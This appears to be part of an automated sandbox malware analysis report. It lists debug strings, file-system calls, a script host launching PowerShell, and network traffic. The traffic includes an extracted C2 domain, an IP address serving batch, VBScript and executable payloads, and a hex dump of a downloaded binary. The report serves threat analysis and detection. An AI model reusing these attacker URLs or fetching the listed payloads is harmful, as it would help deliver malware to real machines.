                      Source: Binary string: msacm32.pdbUGP source: cmd.exe, 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036343374.0000000002C82000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184703461.00000000029D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213712123.0000000002F28000.00000008.00000001.01000000.00000000.sdmp, vqqcre.21.dr
                      Source: Binary string: msacm32.pdb source: cmd.exe, 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036343374.0000000002C82000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184703461.00000000029D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213712123.0000000002F28000.00000008.00000001.01000000.00000000.sdmp, vqqcre.21.dr
                      Source: Binary string: wntdll.pdbUGP source: DZIPR.exe, 0000000F.00000002.2746058035.0000000003658000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2746812228.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036465792.0000000004671000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036745577.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185088273.00000000056D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184797234.0000000005235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036747790.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036489203.00000000049CB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3212927126.000000000522C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213166560.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185147377.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184866847.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3214092572.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213878036.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: DZIPR.exe, 0000000F.00000002.2746058035.0000000003658000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2746812228.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036465792.0000000004671000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036745577.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185088273.00000000056D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184797234.0000000005235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036747790.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036489203.00000000049CB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3212927126.000000000522C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213166560.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185147377.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184866847.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3214092572.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213878036.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: AUGUST.exe, 0000000E.00000003.2720616296.000000000267B000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmp, DZIPR.exe, 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.exe, 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.dll.15.dr, DZIPR.dll.14.dr
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,14_2_0040301A
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,14_2_00402B79
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA6748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,15_2_6FA6748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C53748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,16_2_6C53748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD0748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,20_2_6FD0748E
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

                      Software Vulnerabilities

                      barindex
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: fullimmersion777.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Length: 4809996Last-Modified: Wed, 25 Sep 2024 11:52:30 GMTContent-Type: application/x-msdownloadDate: Wed, 25 Sep 2024 14:03:22 GMTETag: "f30293f7a768b837cdb37fc8b138e7a1-1727265150-4809996"Accept-Ranges: bytesServer: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 7e f8 26 4c 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 14 01 00 00 c8 01 00 00 00 00 00 ef 1d 01 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 03 00 00 02 00 00 02 33 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 50 01 00 b4 00 00 00 00 a0 01 00 04 8d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 13 01 00 00 10 00 00 00 14 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ea 30 00 00 00 30 01 00 00 32 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 29 00 00 00 70 01 00 00 08 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 04 8d 01 00 00 a0 01 00 00 8e 01 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec 81 ec 00 09 00 00 53 56 57 6a 27 e8 8a 0f 00 00 8b 75 08 ff 76 0c 8b 3d 60 32 41 00 ff 36 50 8d 85 00 f7 ff ff 50 ff d7 83 65 08 00 83 c4 14 83 7e 10 00 76 38 8d 5e 14 ff 33 8d 85 00 ff ff ff 68 10 33 41 00 50 ff d7 83 c4 0c 8d 85 00 ff ff ff 50 8d 85 00 f7 ff ff 50 ff 15 70 31 41 00 ff 45 08 8b 45 08 83 c3 04 3b 46 10 72 cb 8d 85 00 f7 ff ff 50 e8 2c 66 00 00 59 e8 8b 2d 00 00 6a 0a ff 15 74 31 41 00 cc ff 74 24 04 e8 6c ff ff ff cc 33 c0 39 05 e4 77 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 dc 77 41 00 ff 15 f4 32 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 18 00 83 7c 24 08 00 75 07 c7 40 18 01 00 00 00 33 c0 c2 08 00 8b 44 24 04 85 c0 56 8b f1 89 06 74 06 8b 08 50 ff 51 04 8b c6 5e c2 04 00 8b 54 24 04 56 8b 74 24 0c 8b c2 0f b7 0e 66 89 0a 42 42 46 46 66 85 c9 75 f1 5e c3 8b 4c 24 04 33 c0 66 39 01 74 08 40 66 83 3c 41 00 75 f8 c3 53 8b 5c 24 08 56 8b f1 43 3b 5e 08 74 4c 57 33 c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 b4 0a 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 88 0a 01 00 59 8b 46 04 89 3e 66 83 24 47 00
                      Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                      Source: global trafficHTTP traffic detected: GET /ffo.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /hi.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: global trafficHTTP traffic detected: GET /ffo.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /hi.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: 55Ka50lb6Z.batString found in binary or memory: http://172.94.3.25/ffo.bat
                      Source: 55Ka50lb6Z.batString found in binary or memory: http://172.94.3.25/hi.vbs
                      Source: DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c0rl.m%L
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
